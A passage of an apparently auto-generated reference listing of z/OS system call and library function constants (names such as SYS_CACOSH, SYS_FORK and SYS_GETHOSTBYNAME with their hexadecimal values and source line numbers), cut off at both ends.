0x8E3 constant SYS___REXEC_A (line 1357) | SYS___REXEC_A = 0x8C4 constant SYS___REXEC_AF_A (line 1358) | SYS___REXEC_AF_A = 0x8C5 constant SYS___SET_EXCEPTION_HANDLER (line 1359) | SYS___SET_EXCEPTION_HANDLER = 0x8E2 constant SYS___SNPRINTF_A (line 1360) | SYS___SNPRINTF_A = 0x8CD constant SYS___SUPERKILL (line 1361) | SYS___SUPERKILL = 0x8A4 constant SYS___TCGETATTR_A (line 1362) | SYS___TCGETATTR_A = 0x8A1 constant SYS___TCSETATTR_A (line 1363) | SYS___TCSETATTR_A = 0x8A2 constant SYS___ULLTOA (line 1364) | SYS___ULLTOA = 0x8AF constant SYS___ULLTOA_A (line 1365) | SYS___ULLTOA_A = 0x8B5 constant SYS___ULTOA (line 1366) | SYS___ULTOA = 0x8AD constant SYS___ULTOA_A (line 1367) | SYS___ULTOA_A = 0x8B3 constant SYS___UTOA (line 1368) | SYS___UTOA = 0x8AB constant SYS___UTOA_A (line 1369) | SYS___UTOA_A = 0x8B1 constant SYS___VHM_EVENT (line 1370) | SYS___VHM_EVENT = 0x8E4 constant SYS___VSNPRINTF_A (line 1371) | SYS___VSNPRINTF_A = 0x8CE constant SYS_____GETENV_A (line 1372) | SYS_____GETENV_A = 0x8C3 constant SYS_____UTMPXNAME_A (line 1373) | SYS_____UTMPXNAME_A = 0x8CA constant SYS_CACOSH (line 1374) | SYS_CACOSH = 0x9A0 constant SYS_CACOSHF (line 1375) | SYS_CACOSHF = 0x9A3 constant SYS_CACOSHL (line 1376) | SYS_CACOSHL = 0x9A6 constant SYS_CARG (line 1377) | SYS_CARG = 0x9A9 constant SYS_CARGF (line 1378) | SYS_CARGF = 0x9AC constant SYS_CARGL (line 1379) | SYS_CARGL = 0x9AF constant SYS_CASIN (line 1380) | SYS_CASIN = 0x9B2 constant SYS_CASINF (line 1381) | SYS_CASINF = 0x9B5 constant SYS_CASINH (line 1382) | SYS_CASINH = 0x9BB constant SYS_CASINHF (line 1383) | SYS_CASINHF = 0x9BE constant SYS_CASINHL (line 1384) | SYS_CASINHL = 0x9C1 constant SYS_CASINL (line 1385) | SYS_CASINL = 0x9B8 constant SYS_CATAN (line 1386) | SYS_CATAN = 0x9C4 constant SYS_CATANF (line 1387) | SYS_CATANF = 0x9C7 constant SYS_CATANH (line 1388) | SYS_CATANH = 0x9CD constant SYS_CATANHF (line 1389) | SYS_CATANHF = 0x9D0 constant SYS_CATANHL (line 1390) | SYS_CATANHL = 0x9D3 constant SYS_CATANL (line 1391) | SYS_CATANL = 0x9CA constant SYS_CCOS (line 1392) | SYS_CCOS = 0x9D6 constant SYS_CCOSF (line 1393) | SYS_CCOSF = 0x9D9 constant SYS_CCOSH (line 1394) | SYS_CCOSH = 0x9DF constant SYS_CCOSHF (line 1395) | SYS_CCOSHF = 0x9E2 constant SYS_CCOSHL (line 1396) | SYS_CCOSHL = 0x9E5 constant SYS_CCOSL (line 1397) | SYS_CCOSL = 0x9DC constant SYS_CEXP (line 1398) | SYS_CEXP = 0x9E8 constant SYS_CEXPF (line 1399) | SYS_CEXPF = 0x9EB constant SYS_CEXPL (line 1400) | SYS_CEXPL = 0x9EE constant SYS_CIMAG (line 1401) | SYS_CIMAG = 0x9F1 constant SYS_CIMAGF (line 1402) | SYS_CIMAGF = 0x9F4 constant SYS_CIMAGL (line 1403) | SYS_CIMAGL = 0x9F7 constant SYS_CLOGF (line 1404) | SYS_CLOGF = 0x9FD constant SYS_MEMCHR (line 1405) | SYS_MEMCHR = 0x09B constant SYS_MEMCMP (line 1406) | SYS_MEMCMP = 0x09A constant SYS_STRCOLL (line 1407) | SYS_STRCOLL = 0x09C constant SYS_STRNCMP (line 1408) | SYS_STRNCMP = 0x09D constant SYS_STRRCHR (line 1409) | SYS_STRRCHR = 0x09F constant SYS_STRXFRM (line 1410) | SYS_STRXFRM = 0x09E constant SYS___CACOSHF_B (line 1411) | SYS___CACOSHF_B = 0x9A4 constant SYS___CACOSHF_H (line 1412) | SYS___CACOSHF_H = 0x9A5 constant SYS___CACOSHL_B (line 1413) | SYS___CACOSHL_B = 0x9A7 constant SYS___CACOSHL_H (line 1414) | SYS___CACOSHL_H = 0x9A8 constant SYS___CACOSH_B (line 1415) | SYS___CACOSH_B = 0x9A1 constant SYS___CACOSH_H (line 1416) | SYS___CACOSH_H = 0x9A2 constant SYS___CARGF_B (line 1417) | SYS___CARGF_B = 0x9AD constant SYS___CARGF_H (line 1418) | SYS___CARGF_H = 0x9AE constant SYS___CARGL_B (line 1419) | SYS___CARGL_B = 0x9B0 constant SYS___CARGL_H (line 1420) | SYS___CARGL_H = 0x9B1 constant SYS___CARG_B (line 1421) | SYS___CARG_B = 0x9AA constant SYS___CARG_H (line 1422) | SYS___CARG_H = 0x9AB constant SYS___CASINF_B (line 1423) | SYS___CASINF_B = 0x9B6 constant SYS___CASINF_H (line 1424) | SYS___CASINF_H = 0x9B7 constant SYS___CASINHF_B (line 1425) | SYS___CASINHF_B = 0x9BF constant SYS___CASINHF_H (line 1426) | SYS___CASINHF_H = 0x9C0 constant SYS___CASINHL_B (line 1427) | SYS___CASINHL_B = 0x9C2 constant SYS___CASINHL_H (line 1428) | SYS___CASINHL_H = 0x9C3 constant SYS___CASINH_B (line 1429) | SYS___CASINH_B = 0x9BC constant SYS___CASINH_H (line 1430) | SYS___CASINH_H = 0x9BD constant SYS___CASINL_B (line 1431) | SYS___CASINL_B = 0x9B9 constant SYS___CASINL_H (line 1432) | SYS___CASINL_H = 0x9BA constant SYS___CASIN_B (line 1433) | SYS___CASIN_B = 0x9B3 constant SYS___CASIN_H (line 1434) | SYS___CASIN_H = 0x9B4 constant SYS___CATANF_B (line 1435) | SYS___CATANF_B = 0x9C8 constant SYS___CATANF_H (line 1436) | SYS___CATANF_H = 0x9C9 constant SYS___CATANHF_B (line 1437) | SYS___CATANHF_B = 0x9D1 constant SYS___CATANHF_H (line 1438) | SYS___CATANHF_H = 0x9D2 constant SYS___CATANHL_B (line 1439) | SYS___CATANHL_B = 0x9D4 constant SYS___CATANHL_H (line 1440) | SYS___CATANHL_H = 0x9D5 constant SYS___CATANH_B (line 1441) | SYS___CATANH_B = 0x9CE constant SYS___CATANH_H (line 1442) | SYS___CATANH_H = 0x9CF constant SYS___CATANL_B (line 1443) | SYS___CATANL_B = 0x9CB constant SYS___CATANL_H (line 1444) | SYS___CATANL_H = 0x9CC constant SYS___CATAN_B (line 1445) | SYS___CATAN_B = 0x9C5 constant SYS___CATAN_H (line 1446) | SYS___CATAN_H = 0x9C6 constant SYS___CCOSF_B (line 1447) | SYS___CCOSF_B = 0x9DA constant SYS___CCOSF_H (line 1448) | SYS___CCOSF_H = 0x9DB constant SYS___CCOSHF_B (line 1449) | SYS___CCOSHF_B = 0x9E3 constant SYS___CCOSHF_H (line 1450) | SYS___CCOSHF_H = 0x9E4 constant SYS___CCOSHL_B (line 1451) | SYS___CCOSHL_B = 0x9E6 constant SYS___CCOSHL_H (line 1452) | SYS___CCOSHL_H = 0x9E7 constant SYS___CCOSH_B (line 1453) | SYS___CCOSH_B = 0x9E0 constant SYS___CCOSH_H (line 1454) | SYS___CCOSH_H = 0x9E1 constant SYS___CCOSL_B (line 1455) | SYS___CCOSL_B = 0x9DD constant SYS___CCOSL_H (line 1456) | SYS___CCOSL_H = 0x9DE constant SYS___CCOS_B (line 1457) | SYS___CCOS_B = 0x9D7 constant SYS___CCOS_H (line 1458) | SYS___CCOS_H = 0x9D8 constant SYS___CEXPF_B (line 1459) | SYS___CEXPF_B = 0x9EC constant SYS___CEXPF_H (line 1460) | SYS___CEXPF_H = 0x9ED constant SYS___CEXPL_B (line 1461) | SYS___CEXPL_B = 0x9EF constant SYS___CEXPL_H (line 1462) | SYS___CEXPL_H = 0x9F0 constant SYS___CEXP_B (line 1463) | SYS___CEXP_B = 0x9E9 constant SYS___CEXP_H (line 1464) | SYS___CEXP_H = 0x9EA constant SYS___CIMAGF_B (line 1465) | SYS___CIMAGF_B = 0x9F5 constant SYS___CIMAGF_H (line 1466) | SYS___CIMAGF_H = 0x9F6 constant SYS___CIMAGL_B (line 1467) | SYS___CIMAGL_B = 0x9F8 constant SYS___CIMAGL_H (line 1468) | SYS___CIMAGL_H = 0x9F9 constant SYS___CIMAG_B (line 1469) | SYS___CIMAG_B = 0x9F2 constant SYS___CIMAG_H (line 1470) | SYS___CIMAG_H = 0x9F3 constant SYS___CLOG (line 1471) | SYS___CLOG = 0x9FA constant SYS___CLOGF_B (line 1472) | SYS___CLOGF_B = 0x9FE constant SYS___CLOGF_H (line 1473) | SYS___CLOGF_H = 0x9FF constant SYS___CLOG_B (line 1474) | SYS___CLOG_B = 0x9FB constant SYS___CLOG_H (line 1475) | SYS___CLOG_H = 0x9FC constant SYS_ISWCTYPE (line 1476) | SYS_ISWCTYPE = 0x10C constant SYS_ISWXDIGI (line 1477) | SYS_ISWXDIGI = 0x10A constant SYS_ISWXDIGIT (line 1478) | SYS_ISWXDIGIT = 0x10A constant SYS_MBSINIT (line 1479) | SYS_MBSINIT = 0x10F constant SYS_TOWLOWER (line 1480) | SYS_TOWLOWER = 0x10D constant SYS_TOWUPPER (line 1481) | SYS_TOWUPPER = 0x10E constant SYS_WCTYPE (line 1482) | SYS_WCTYPE = 0x10B constant SYS_WCSSTR (line 1483) | SYS_WCSSTR = 0x11B constant SYS___RPMTCH (line 1484) | SYS___RPMTCH = 0x11A constant SYS_WCSTOD (line 1485) | SYS_WCSTOD = 0x12E constant SYS_WCSTOK (line 1486) | SYS_WCSTOK = 0x12C constant SYS_WCSTOL (line 1487) | SYS_WCSTOL = 0x12D constant SYS_WCSTOUL (line 1488) | SYS_WCSTOUL = 0x12F constant SYS_FGETWC (line 1489) | SYS_FGETWC = 0x13C constant SYS_FGETWS (line 1490) | SYS_FGETWS = 0x13D constant SYS_FPUTWC (line 1491) | SYS_FPUTWC = 0x13E constant SYS_FPUTWS (line 1492) | SYS_FPUTWS = 0x13F constant SYS_REGERROR (line 1493) | SYS_REGERROR = 0x13B constant SYS_REGFREE (line 1494) | SYS_REGFREE = 0x13A constant SYS_COLLEQUIV (line 1495) | SYS_COLLEQUIV = 0x14F constant SYS_COLLTOSTR (line 1496) | SYS_COLLTOSTR = 0x14E constant SYS_ISMCCOLLEL (line 1497) | SYS_ISMCCOLLEL = 0x14C constant SYS_STRTOCOLL (line 1498) | SYS_STRTOCOLL = 0x14D constant SYS_DLLFREE (line 1499) | SYS_DLLFREE = 0x16F constant SYS_DLLQUERYFN (line 1500) | SYS_DLLQUERYFN = 0x16D constant SYS_DLLQUERYVAR (line 1501) | SYS_DLLQUERYVAR = 0x16E constant SYS_GETMCCOLL (line 1502) | SYS_GETMCCOLL = 0x16A constant SYS_GETWMCCOLL (line 1503) | SYS_GETWMCCOLL = 0x16B constant SYS___ERR2AD (line 1504) | SYS___ERR2AD = 0x16C constant SYS_CFSETOSPEED (line 1505) | SYS_CFSETOSPEED = 0x17A constant SYS_CHDIR (line 1506) | SYS_CHDIR = 0x17B constant SYS_CHMOD (line 1507) | SYS_CHMOD = 0x17C constant SYS_CHOWN (line 1508) | SYS_CHOWN = 0x17D constant SYS_CLOSE (line 1509) | SYS_CLOSE = 0x17E constant SYS_CLOSEDIR (line 1510) | SYS_CLOSEDIR = 0x17F constant SYS_LOG (line 1511) | SYS_LOG = 0x017 constant SYS_COSH (line 1512) | SYS_COSH = 0x018 constant SYS_FCHMOD (line 1513) | SYS_FCHMOD = 0x18A constant SYS_FCHOWN (line 1514) | SYS_FCHOWN = 0x18B constant SYS_FCNTL (line 1515) | SYS_FCNTL = 0x18C constant SYS_FILENO (line 1516) | SYS_FILENO = 0x18D constant SYS_FORK (line 1517) | SYS_FORK = 0x18E constant SYS_FPATHCONF (line 1518) | SYS_FPATHCONF = 0x18F constant SYS_GETLOGIN (line 1519) | SYS_GETLOGIN = 0x19A constant SYS_GETPGRP (line 1520) | SYS_GETPGRP = 0x19C constant SYS_GETPID (line 1521) | SYS_GETPID = 0x19D constant SYS_GETPPID (line 1522) | SYS_GETPPID = 0x19E constant SYS_GETPWNAM (line 1523) | SYS_GETPWNAM = 0x19F constant SYS_TANH (line 1524) | SYS_TANH = 0x019 constant SYS_W_GETMNTENT (line 1525) | SYS_W_GETMNTENT = 0x19B constant SYS_POW (line 1526) | SYS_POW = 0x020 constant SYS_PTHREAD_SELF (line 1527) | SYS_PTHREAD_SELF = 0x20A constant SYS_PTHREAD_SETINTR (line 1528) | SYS_PTHREAD_SETINTR = 0x20B constant SYS_PTHREAD_SETINTRTYPE (line 1529) | SYS_PTHREAD_SETINTRTYPE = 0x20C constant SYS_PTHREAD_SETSPECIFIC (line 1530) | SYS_PTHREAD_SETSPECIFIC = 0x20D constant SYS_PTHREAD_TESTINTR (line 1531) | SYS_PTHREAD_TESTINTR = 0x20E constant SYS_PTHREAD_YIELD (line 1532) | SYS_PTHREAD_YIELD = 0x20F constant SYS_SQRT (line 1533) | SYS_SQRT = 0x021 constant SYS_FLOOR (line 1534) | SYS_FLOOR = 0x022 constant SYS_J1 (line 1535) | SYS_J1 = 0x023 constant SYS_WCSPBRK (line 1536) | SYS_WCSPBRK = 0x23F constant SYS_BSEARCH (line 1537) | SYS_BSEARCH = 0x24C constant SYS_FABS (line 1538) | SYS_FABS = 0x024 constant SYS_GETENV (line 1539) | SYS_GETENV = 0x24A constant SYS_LDIV (line 1540) | SYS_LDIV = 0x24D constant SYS_SYSTEM (line 1541) | SYS_SYSTEM = 0x24B constant SYS_FMOD (line 1542) | SYS_FMOD = 0x025 constant SYS___RETHROW (line 1543) | SYS___RETHROW = 0x25F constant SYS___THROW (line 1544) | SYS___THROW = 0x25E constant SYS_J0 (line 1545) | SYS_J0 = 0x026 constant SYS_PUTENV (line 1546) | SYS_PUTENV = 0x26A constant SYS___GETENV (line 1547) | SYS___GETENV = 0x26F constant SYS_SEMCTL (line 1548) | SYS_SEMCTL = 0x27A constant SYS_SEMGET (line 1549) | SYS_SEMGET = 0x27B constant SYS_SEMOP (line 1550) | SYS_SEMOP = 0x27C constant SYS_SHMAT (line 1551) | SYS_SHMAT = 0x27D constant SYS_SHMCTL (line 1552) | SYS_SHMCTL = 0x27E constant SYS_SHMDT (line 1553) | SYS_SHMDT = 0x27F constant SYS_YN (line 1554) | SYS_YN = 0x027 constant SYS_JN (line 1555) | SYS_JN = 0x028 constant SYS_SIGALTSTACK (line 1556) | SYS_SIGALTSTACK = 0x28A constant SYS_SIGHOLD (line 1557) | SYS_SIGHOLD = 0x28B constant SYS_SIGIGNORE (line 1558) | SYS_SIGIGNORE = 0x28C constant SYS_SIGINTERRUPT (line 1559) | SYS_SIGINTERRUPT = 0x28D constant SYS_SIGPAUSE (line 1560) | SYS_SIGPAUSE = 0x28E constant SYS_SIGRELSE (line 1561) | SYS_SIGRELSE = 0x28F constant SYS_GETOPT (line 1562) | SYS_GETOPT = 0x29A constant SYS_GETSUBOPT (line 1563) | SYS_GETSUBOPT = 0x29D constant SYS_LCHOWN (line 1564) | SYS_LCHOWN = 0x29B constant SYS_SETPGRP (line 1565) | SYS_SETPGRP = 0x29E constant SYS_TRUNCATE (line 1566) | SYS_TRUNCATE = 0x29C constant SYS_Y0 (line 1567) | SYS_Y0 = 0x029 constant SYS___GDERR (line 1568) | SYS___GDERR = 0x29F constant SYS_ISALPHA (line 1569) | SYS_ISALPHA = 0x030 constant SYS_VFORK (line 1570) | SYS_VFORK = 0x30F constant SYS__LONGJMP (line 1571) | SYS__LONGJMP = 0x30D constant SYS__SETJMP (line 1572) | SYS__SETJMP = 0x30E constant SYS_GLOB (line 1573) | SYS_GLOB = 0x31A constant SYS_GLOBFREE (line 1574) | SYS_GLOBFREE = 0x31B constant SYS_ISALNUM (line 1575) | SYS_ISALNUM = 0x031 constant SYS_PUTW (line 1576) | SYS_PUTW = 0x31C constant SYS_SEEKDIR (line 1577) | SYS_SEEKDIR = 0x31D constant SYS_TELLDIR (line 1578) | SYS_TELLDIR = 0x31E constant SYS_TEMPNAM (line 1579) | SYS_TEMPNAM = 0x31F constant SYS_GETTIMEOFDAY_R (line 1580) | SYS_GETTIMEOFDAY_R = 0x32E constant SYS_ISLOWER (line 1581) | SYS_ISLOWER = 0x032 constant SYS_LGAMMA (line 1582) | SYS_LGAMMA = 0x32C constant SYS_REMAINDER (line 1583) | SYS_REMAINDER = 0x32A constant SYS_SCALB (line 1584) | SYS_SCALB = 0x32B constant SYS_SYNC (line 1585) | SYS_SYNC = 0x32F constant SYS_TTYSLOT (line 1586) | SYS_TTYSLOT = 0x32D constant SYS_ENDPROTOENT (line 1587) | SYS_ENDPROTOENT = 0x33A constant SYS_ENDSERVENT (line 1588) | SYS_ENDSERVENT = 0x33B constant SYS_GETHOSTBYADDR (line 1589) | SYS_GETHOSTBYADDR = 0x33D constant SYS_GETHOSTBYADDR_R (line 1590) | SYS_GETHOSTBYADDR_R = 0x33C constant SYS_GETHOSTBYNAME (line 1591) | SYS_GETHOSTBYNAME = 0x33F constant SYS_GETHOSTBYNAME_R (line 1592) | SYS_GETHOSTBYNAME_R = 0x33E constant SYS_ISCNTRL (line 1593) | SYS_ISCNTRL = 0x033 constant SYS_GETSERVBYNAME (line 1594) | SYS_GETSERVBYNAME = 0x34A constant SYS_GETSERVBYPORT (line 1595) | SYS_GETSERVBYPORT = 0x34B constant SYS_GETSERVENT (line 1596) | SYS_GETSERVENT = 0x34C constant SYS_GETSOCKNAME (line 1597) | SYS_GETSOCKNAME = 0x34D constant SYS_GETSOCKOPT (line 1598) | SYS_GETSOCKOPT = 0x34E constant SYS_INET_ADDR (line 1599) | SYS_INET_ADDR = 0x34F constant SYS_ISDIGIT (line 1600) | SYS_ISDIGIT = 0x034 constant SYS_ISGRAPH (line 1601) | SYS_ISGRAPH = 0x035 constant SYS_SELECT (line 1602) | SYS_SELECT = 0x35B constant SYS_SELECTEX (line 1603) | SYS_SELECTEX = 0x35C constant SYS_SEND (line 1604) | SYS_SEND = 0x35D constant SYS_SENDTO (line 1605) | SYS_SENDTO = 0x35F constant SYS_CHROOT (line 1606) | SYS_CHROOT = 0x36A constant SYS_ISNAN (line 1607) | SYS_ISNAN = 0x36D constant SYS_ISUPPER (line 1608) | SYS_ISUPPER = 0x036 constant SYS_ULIMIT (line 1609) | SYS_ULIMIT = 0x36C constant SYS_UTIMES (line 1610) | SYS_UTIMES = 0x36E constant SYS_W_STATVFS (line 1611) | SYS_W_STATVFS = 0x36B constant SYS___H_ERRNO (line 1612) | SYS___H_ERRNO = 0x36F constant SYS_GRANTPT (line 1613) | SYS_GRANTPT = 0x37A constant SYS_ISPRINT (line 1614) | SYS_ISPRINT = 0x037 constant SYS_TCGETSID (line 1615) | SYS_TCGETSID = 0x37C constant SYS_UNLOCKPT (line 1616) | SYS_UNLOCKPT = 0x37B constant SYS___TCGETCP (line 1617) | SYS___TCGETCP = 0x37D constant SYS___TCSETCP (line 1618) | SYS___TCSETCP = 0x37E constant SYS___TCSETTABLES (line 1619) | SYS___TCSETTABLES = 0x37F constant SYS_ISPUNCT (line 1620) | SYS_ISPUNCT = 0x038 constant SYS_NLIST (line 1621) | SYS_NLIST = 0x38C constant SYS___IPDBCS (line 1622) | SYS___IPDBCS = 0x38D constant SYS___IPDSPX (line 1623) | SYS___IPDSPX = 0x38E constant SYS___IPMSGC (line 1624) | SYS___IPMSGC = 0x38F constant SYS___STHOSTENT (line 1625) | SYS___STHOSTENT = 0x38B constant SYS___STSERVENT (line 1626) | SYS___STSERVENT = 0x38A constant SYS_ISSPACE (line 1627) | SYS_ISSPACE = 0x039 constant SYS_COS (line 1628) | SYS_COS = 0x040 constant SYS_T_ALLOC (line 1629) | SYS_T_ALLOC = 0x40A constant SYS_T_BIND (line 1630) | SYS_T_BIND = 0x40B constant SYS_T_CLOSE (line 1631) | SYS_T_CLOSE = 0x40C constant SYS_T_CONNECT (line 1632) | SYS_T_CONNECT = 0x40D constant SYS_T_ERROR (line 1633) | SYS_T_ERROR = 0x40E constant SYS_T_FREE (line 1634) | SYS_T_FREE = 0x40F constant SYS_TAN (line 1635) | SYS_TAN = 0x041 constant SYS_T_RCVREL (line 1636) | SYS_T_RCVREL = 0x41A constant SYS_T_RCVUDATA (line 1637) | SYS_T_RCVUDATA = 0x41B constant SYS_T_RCVUDERR (line 1638) | SYS_T_RCVUDERR = 0x41C constant SYS_T_SND (line 1639) | SYS_T_SND = 0x41D constant SYS_T_SNDDIS (line 1640) | SYS_T_SNDDIS = 0x41E constant SYS_T_SNDREL (line 1641) | SYS_T_SNDREL = 0x41F constant SYS_GETPMSG (line 1642) | SYS_GETPMSG = 0x42A constant SYS_ISASTREAM (line 1643) | SYS_ISASTREAM = 0x42B constant SYS_PUTMSG (line 1644) | SYS_PUTMSG = 0x42C constant SYS_PUTPMSG (line 1645) | SYS_PUTPMSG = 0x42D constant SYS_SINH (line 1646) | SYS_SINH = 0x042 constant SYS___ISPOSIXON (line 1647) | SYS___ISPOSIXON = 0x42E constant SYS___OPENMVSREL (line 1648) | SYS___OPENMVSREL = 0x42F constant SYS_ACOS (line 1649) | SYS_ACOS = 0x043 constant SYS_ATAN (line 1650) | SYS_ATAN = 0x044 constant SYS_ATAN2 (line 1651) | SYS_ATAN2 = 0x045 constant SYS_FTELL (line 1652) | SYS_FTELL = 0x046 constant SYS_FGETPOS (line 1653) | SYS_FGETPOS = 0x047 constant SYS_SOCK_DEBUG (line 1654) | SYS_SOCK_DEBUG = 0x47A constant SYS_SOCK_DO_TESTSTOR (line 1655) | SYS_SOCK_DO_TESTSTOR = 0x47D constant SYS_TAKESOCKET (line 1656) | SYS_TAKESOCKET = 0x47E constant SYS___SERVER_INIT (line 1657) | SYS___SERVER_INIT = 0x47F constant SYS_FSEEK (line 1658) | SYS_FSEEK = 0x048 constant SYS___IPHOST (line 1659) | SYS___IPHOST = 0x48B constant SYS___IPNODE (line 1660) | SYS___IPNODE = 0x48C constant SYS___SERVER_CLASSIFY_CREATE (line 1661) | SYS___SERVER_CLASSIFY_CREATE = 0x48D constant SYS___SERVER_CLASSIFY_DESTROY (line 1662) | SYS___SERVER_CLASSIFY_DESTROY = 0x48E constant SYS___SERVER_CLASSIFY_RESET (line 1663) | SYS___SERVER_CLASSIFY_RESET = 0x48F constant SYS___SMF_RECORD (line 1664) | SYS___SMF_RECORD = 0x48A constant SYS_FSETPOS (line 1665) | SYS_FSETPOS = 0x049 constant SYS___FNWSA (line 1666) | SYS___FNWSA = 0x49B constant SYS___SPAWN2 (line 1667) | SYS___SPAWN2 = 0x49D constant SYS___SPAWNP2 (line 1668) | SYS___SPAWNP2 = 0x49E constant SYS_ATOF (line 1669) | SYS_ATOF = 0x050 constant SYS_PTHREAD_MUTEXATTR_GETPSHARED (line 1670) | SYS_PTHREAD_MUTEXATTR_GETPSHARED = 0x50A constant SYS_PTHREAD_MUTEXATTR_SETPSHARED (line 1671) | SYS_PTHREAD_MUTEXATTR_SETPSHARED = 0x50B constant SYS_PTHREAD_RWLOCK_DESTROY (line 1672) | SYS_PTHREAD_RWLOCK_DESTROY = 0x50C constant SYS_PTHREAD_RWLOCK_INIT (line 1673) | SYS_PTHREAD_RWLOCK_INIT = 0x50D constant SYS_PTHREAD_RWLOCK_RDLOCK (line 1674) | SYS_PTHREAD_RWLOCK_RDLOCK = 0x50E constant SYS_PTHREAD_RWLOCK_TRYRDLOCK (line 1675) | SYS_PTHREAD_RWLOCK_TRYRDLOCK = 0x50F constant SYS_ATOI (line 1676) | SYS_ATOI = 0x051 constant SYS___FP_CLASS (line 1677) | SYS___FP_CLASS = 0x51D constant SYS___FP_CLR_FLAG (line 1678) | SYS___FP_CLR_FLAG = 0x51A constant SYS___FP_FINITE (line 1679) | SYS___FP_FINITE = 0x51E constant SYS___FP_ISNAN (line 1680) | SYS___FP_ISNAN = 0x51F constant SYS___FP_RAISE_XCP (line 1681) | SYS___FP_RAISE_XCP = 0x51C constant SYS___FP_READ_FLAG (line 1682) | SYS___FP_READ_FLAG = 0x51B constant SYS_RAND (line 1683) | SYS_RAND = 0x052 constant SYS_SIGTIMEDWAIT (line 1684) | SYS_SIGTIMEDWAIT = 0x52D constant SYS_SIGWAITINFO (line 1685) | SYS_SIGWAITINFO = 0x52E constant SYS___CHKBFP (line 1686) | SYS___CHKBFP = 0x52F constant SYS___FPC_RS (line 1687) | SYS___FPC_RS = 0x52C constant SYS___FPC_RW (line 1688) | SYS___FPC_RW = 0x52A constant SYS___FPC_SM (line 1689) | SYS___FPC_SM = 0x52B constant SYS_STRTOD (line 1690) | SYS_STRTOD = 0x053 constant SYS_STRTOL (line 1691) | SYS_STRTOL = 0x054 constant SYS_STRTOUL (line 1692) | SYS_STRTOUL = 0x055 constant SYS_MALLOC (line 1693) | SYS_MALLOC = 0x056 constant SYS_SRAND (line 1694) | SYS_SRAND = 0x057 constant SYS_CALLOC (line 1695) | SYS_CALLOC = 0x058 constant SYS_FREE (line 1696) | SYS_FREE = 0x059 constant SYS___OSENV (line 1697) | SYS___OSENV = 0x59F constant SYS___W_PIOCTL (line 1698) | SYS___W_PIOCTL = 0x59E constant SYS_LONGJMP (line 1699) | SYS_LONGJMP = 0x060 constant SYS___FLOORF_B (line 1700) | SYS___FLOORF_B = 0x60A constant SYS___FLOORL_B (line 1701) | SYS___FLOORL_B = 0x60B constant SYS___FREXPF_B (line 1702) | SYS___FREXPF_B = 0x60C constant SYS___FREXPL_B (line 1703) | SYS___FREXPL_B = 0x60D constant SYS___LDEXPF_B (line 1704) | SYS___LDEXPF_B = 0x60E constant SYS___LDEXPL_B (line 1705) | SYS___LDEXPL_B = 0x60F constant SYS_SIGNAL (line 1706) | SYS_SIGNAL = 0x061 constant SYS___ATAN2F_B (line 1707) | SYS___ATAN2F_B = 0x61A constant SYS___ATAN2L_B (line 1708) | SYS___ATAN2L_B = 0x61B constant SYS___COSHF_B (line 1709) | SYS___COSHF_B = 0x61C constant SYS___COSHL_B (line 1710) | SYS___COSHL_B = 0x61D constant SYS___EXPF_B (line 1711) | SYS___EXPF_B = 0x61E constant SYS___EXPL_B (line 1712) | SYS___EXPL_B = 0x61F constant SYS_TMPNAM (line 1713) | SYS_TMPNAM = 0x062 constant SYS___ABSF_B (line 1714) | SYS___ABSF_B = 0x62A constant SYS___ABSL_B (line 1715) | SYS___ABSL_B = 0x62C constant SYS___ABS_B (line 1716) | SYS___ABS_B = 0x62B constant SYS___FMODF_B (line 1717) | SYS___FMODF_B = 0x62D constant SYS___FMODL_B (line 1718) | SYS___FMODL_B = 0x62E constant SYS___MODFF_B (line 1719) | SYS___MODFF_B = 0x62F constant SYS_ATANL (line 1720) | SYS_ATANL = 0x63A constant SYS_CEILF (line 1721) | SYS_CEILF = 0x63B constant SYS_CEILL (line 1722) | SYS_CEILL = 0x63C constant SYS_COSF (line 1723) | SYS_COSF = 0x63D constant SYS_COSHF (line 1724) | SYS_COSHF = 0x63F constant SYS_COSL (line 1725) | SYS_COSL = 0x63E constant SYS_REMOVE (line 1726) | SYS_REMOVE = 0x063 constant SYS_POWL (line 1727) | SYS_POWL = 0x64A constant SYS_RENAME (line 1728) | SYS_RENAME = 0x064 constant SYS_SINF (line 1729) | SYS_SINF = 0x64B constant SYS_SINHF (line 1730) | SYS_SINHF = 0x64F constant SYS_SINL (line 1731) | SYS_SINL = 0x64C constant SYS_SQRTF (line 1732) | SYS_SQRTF = 0x64D constant SYS_SQRTL (line 1733) | SYS_SQRTL = 0x64E constant SYS_BTOWC (line 1734) | SYS_BTOWC = 0x65F constant SYS_FREXPL (line 1735) | SYS_FREXPL = 0x65A constant SYS_LDEXPF (line 1736) | SYS_LDEXPF = 0x65B constant SYS_LDEXPL (line 1737) | SYS_LDEXPL = 0x65C constant SYS_MODFF (line 1738) | SYS_MODFF = 0x65D constant SYS_MODFL (line 1739) | SYS_MODFL = 0x65E constant SYS_TMPFILE (line 1740) | SYS_TMPFILE = 0x065 constant SYS_FREOPEN (line 1741) | SYS_FREOPEN = 0x066 constant SYS___CHARMAP_INIT_A (line 1742) | SYS___CHARMAP_INIT_A = 0x66E constant SYS___GETHOSTBYADDR_R_A (line 1743) | SYS___GETHOSTBYADDR_R_A = 0x66C constant SYS___GETHOSTBYNAME_A (line 1744) | SYS___GETHOSTBYNAME_A = 0x66A constant SYS___GETHOSTBYNAME_R_A (line 1745) | SYS___GETHOSTBYNAME_R_A = 0x66D constant SYS___MBLEN_A (line 1746) | SYS___MBLEN_A = 0x66F constant SYS___RES_INIT_A (line 1747) | SYS___RES_INIT_A = 0x66B constant SYS_FCLOSE (line 1748) | SYS_FCLOSE = 0x067 constant SYS___GETGRGID_R_A (line 1749) | SYS___GETGRGID_R_A = 0x67D constant SYS___WCSTOMBS_A (line 1750) | SYS___WCSTOMBS_A = 0x67A constant SYS___WCSTOMBS_STD_A (line 1751) | SYS___WCSTOMBS_STD_A = 0x67B constant SYS___WCSWIDTH_A (line 1752) | SYS___WCSWIDTH_A = 0x67C constant SYS___WCSWIDTH_ASIA (line 1753) | SYS___WCSWIDTH_ASIA = 0x67F constant SYS___WCSWIDTH_STD_A (line 1754) | SYS___WCSWIDTH_STD_A = 0x67E constant SYS_FFLUSH (line 1755) | SYS_FFLUSH = 0x068 constant SYS___GETLOGIN_R_A (line 1756) | SYS___GETLOGIN_R_A = 0x68E constant SYS___GETPWNAM_R_A (line 1757) | SYS___GETPWNAM_R_A = 0x68C constant SYS___GETPWUID_R_A (line 1758) | SYS___GETPWUID_R_A = 0x68D constant SYS___TTYNAME_R_A (line 1759) | SYS___TTYNAME_R_A = 0x68F constant SYS___WCWIDTH_ASIA (line 1760) | SYS___WCWIDTH_ASIA = 0x68B constant 